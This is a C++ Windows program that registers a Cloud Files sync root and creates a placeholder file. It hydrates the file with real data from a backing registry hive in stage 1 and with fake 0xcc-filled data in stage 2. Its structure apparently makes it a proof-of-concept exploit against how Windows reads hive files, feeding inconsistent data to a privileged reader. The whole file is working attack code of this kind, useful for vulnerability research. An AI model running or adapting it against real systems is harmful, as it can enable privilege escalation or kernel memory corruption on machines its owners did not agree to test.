#define _CRT_SECURE_NO_WARNINGS
#include <Windows.h>
#include <ks.h>
#include <ksmedia.h>
#include <cfapi.h>
#include <combaseapi.h>

#include <cstdio>
#include <string>

#pragma comment(lib, "CldApi")

namespace globals {

//
// Path of the backing hive file.
//
std::wstring BackingFilePath;

//
// Indicates whether the file hydration callback should provide real (stage 1)
// or fake (stage 2) hive data.
//
BOOL FakeHiveData = FALSE;

}  // namespace globals

ULONG GetBackingFileSize() {
  FILE* f = _wfopen(globals::BackingFilePath.c_str(), L"rb");

  fseek(f, 0, SEEK_END);
  ULONG Size = ftell(f);

  fclose(f);

  return Size;
}

VOID CALLBACK DoTransferCallback(CONST CF_CALLBACK_INFO* CallbackInfo, CONST CF_CALLBACK_PARAMETERS* CallbackParameters) {
  CF_OPERATION_INFO opInfo = { 0 };
  CF_OPERATION_PARAMETERS opParams;

  SIZE_T length = CallbackParameters->FetchData.RequiredLength.QuadPart;
  SIZE_T offset = CallbackParameters->FetchData.RequiredFileOffset.QuadPart;

  wprintf(L"Read request for offset %zx length %zx\n", offset, length);

  PVOID buffer = HeapAlloc(GetProcessHeap(), 0, length);

  //
  // Depending on the global flags, provide real or fake hive data.
  //

  if (globals::FakeHiveData) {
    memset(buffer, 0xcc, length);
  } else {
    FILE* f = _wfopen(globals::BackingFilePath.c_str(), L"rb");
    fseek(f, offset, SEEK_SET);
    fread(buffer, 1, length, f);
    fclose(f);
  }

  opInfo.StructSize = sizeof(opInfo);
  opInfo.Type = CF_OPERATION_TYPE_TRANSFER_DATA;
  opInfo.ConnectionKey = CallbackInfo->ConnectionKey;
  opInfo.TransferKey = CallbackInfo->TransferKey;

  opParams.ParamSize = sizeof(opParams);
  opParams.TransferData.CompletionStatus = 0;
  opParams.TransferData.Buffer = buffer;
  opParams.TransferData.Offset.QuadPart = offset;
  opParams.TransferData.Length.QuadPart = length;

  HRESULT res = CfExecute(&opInfo, &opParams);

  if (res != S_OK) {
    wprintf(L"CfExecute(CF_OPERATION_TYPE_TRANSFER_DATA) failed with error %x\n", res);
  }

  HeapFree(GetProcessHeap(), 0, buffer);
}

int wmain(int argc, wchar_t** argv) {
  if (argc != 5) {
    wprintf(L"Usage: %s <stage 1/2> <syncroot directory> <placeholder file name> <backing file path>\n", argv[0]);
    return 1;
  }

  CONST UINT Stage = _wtoi(argv[1]);
  std::wstring SyncRoot = argv[2];
  std::wstring PlaceholderFilename = argv[3];
  std::wstring CombinedDatPath = SyncRoot + L"\\" + PlaceholderFilename;
  globals::BackingFilePath = argv[4];

  if (Stage == 2) {
    globals::FakeHiveData = TRUE;
  } else {
    globals::FakeHiveData = FALSE;
  }

  DWORD dwFileAttrib = GetFileAttributes(SyncRoot.c_str());
  if (dwFileAttrib == INVALID_FILE_ATTRIBUTES) {
    if (!CreateDirectory(SyncRoot.c_str(), NULL)) {
      wprintf(L"Unable to create syncroot directory\n");
      return 1;
    }
  }
  else if (!(dwFileAttrib & FILE_ATTRIBUTE_DIRECTORY)) {
    wprintf(L"The syncroot path is not a directory!\n");
    return 1;
  }

  GUID ProviderId;
  CLSIDFromString(L"{B196E670-59C7-4D41-9637-C62D80541321}", &ProviderId);

  CF_SYNC_REGISTRATION reg = { 0 };
  reg.StructSize = sizeof(reg);
  reg.ProviderName = L"Foo";
  reg.ProviderVersion = L"1.0";
  reg.ProviderId = ProviderId;

  CF_SYNC_POLICIES policies = { 0 };
  policies.StructSize = sizeof(policies);
  policies.HardLink = CF_HARDLINK_POLICY_ALLOWED;
  policies.Hydration.Primary = CF_HYDRATION_POLICY_FULL;
  policies.Hydration.Modifier = CF_HYDRATION_POLICY_MODIFIER_STREAMING_ALLOWED | CF_HYDRATION_POLICY_MODIFIER_AUTO_DEHYDRATION_ALLOWED;
  policies.InSync = CF_INSYNC_POLICY_NONE;
  policies.Population.Primary = CF_POPULATION_POLICY_PARTIAL;

  HRESULT res = CfRegisterSyncRoot(SyncRoot.c_str(), &reg, &policies, CF_REGISTER_FLAG_DISABLE_ON_DEMAND_POPULATION_ON_ROOT);

  if (res == S_OK) {
    CF_CALLBACK_REGISTRATION table[2];
    table[0] = { CF_CALLBACK_TYPE_FETCH_DATA, DoTransferCallback };
    table[1] = { CF_CALLBACK_TYPE_NONE, NULL };

    CF_CONNECTION_KEY key;
    res = CfConnectSyncRoot(SyncRoot.c_str(), table, NULL, CF_CONNECT_FLAG_NONE, &key);
    if (res == S_OK) {

      CF_PLACEHOLDER_CREATE_INFO place_holders[1];
      place_holders[0].RelativeFileName = PlaceholderFilename.c_str();
      place_holders[0].FsMetadata.FileSize.QuadPart = GetBackingFileSize();
      place_holders[0].FsMetadata.BasicInfo.FileAttributes = FILE_ATTRIBUTE_NORMAL;
      place_holders[0].Flags = CF_PLACEHOLDER_CREATE_FLAG_SUPERSEDE | CF_PLACEHOLDER_CREATE_FLAG_MARK_IN_SYNC;
      place_holders[0].FileIdentity = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, 0x130);
      place_holders[0].FileIdentityLength = 0x130;

      DWORD processed;
      res = CfCreatePlaceholders(SyncRoot.c_str(), place_holders, 1, CF_CREATE_FLAG_STOP_ON_ERROR, &processed);
      if (res == S_OK || HRESULT_CODE(res) == ERROR_SHARING_VIOLATION) {
        wprintf(L"Placeholder successfully created\n");

        HANDLE hFile = CreateFileW(CombinedDatPath.c_str(),
                                   SYNCHRONIZE,
                                   FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
                                   NULL,
                                   OPEN_EXISTING,
                                   FILE_ATTRIBUTE_NORMAL,
                                   NULL);

        if (hFile != INVALID_HANDLE_VALUE) {
          CF_TRANSFER_KEY TransferKey;

          res = CfGetTransferKey(hFile, &TransferKey);

          if (res == S_OK) {
            CF_OPERATION_INFO opInfo = { 0 };
            CF_OPERATION_PARAMETERS opParams;

            opInfo.StructSize = sizeof(opInfo);
            opInfo.Type = CF_OPERATION_TYPE_RESTART_HYDRATION;
            opInfo.ConnectionKey = key;
            opInfo.TransferKey = TransferKey;

            opParams.ParamSize = sizeof(opParams);
            opParams.RestartHydration.Flags = CF_OPERATION_RESTART_HYDRATION_FLAG_NONE;
            opParams.RestartHydration.FsMetadata = NULL;
            opParams.RestartHydration.FileIdentity = NULL;
            opParams.RestartHydration.FileIdentityLength = 0;

            res = CfExecute(&opInfo, &opParams);

            if (res == S_OK) {
              wprintf(L"File hydration successfully restarted\n");

              LARGE_INTEGER StartingOffset;
              LARGE_INTEGER Length;

              StartingOffset.QuadPart = 0;
              Length.QuadPart = GetBackingFileSize();

              res = CfHydratePlaceholder(hFile, StartingOffset, Length, CF_HYDRATE_FLAG_NONE, NULL);

              if (res == S_OK) {
                wprintf(L"File successfully hydrated with %s data", globals::FakeHiveData ? L"fake" : L"real");
              } else {
                wprintf(L"CfHydratePlaceholder failed with error %x\n", res);
              }
            } else {
              wprintf(L"CfExecute(CF_OPERATION_TYPE_RESTART_HYDRATION) failed with error %x\n", res);
            }
          } else {
            wprintf(L"CfGetTransferKey failed with error %x\n", res);
          }
        } else {
          wprintf(L"CreateFileW failed with error %u\n", GetLastError());
        }
      }
      else {
        wprintf(L"CfCreatePlaceholders failed with code %x\n", res);
      }

      CfDisconnectSyncRoot(key);
    }
    else {
      wprintf(L"CfConnectSyncRoot failed with code %x\n", res);
    }
  }
  else {
    wprintf(L"CfRegisterSyncRoot failed with code %x\n", res);
  }

  return 0;
}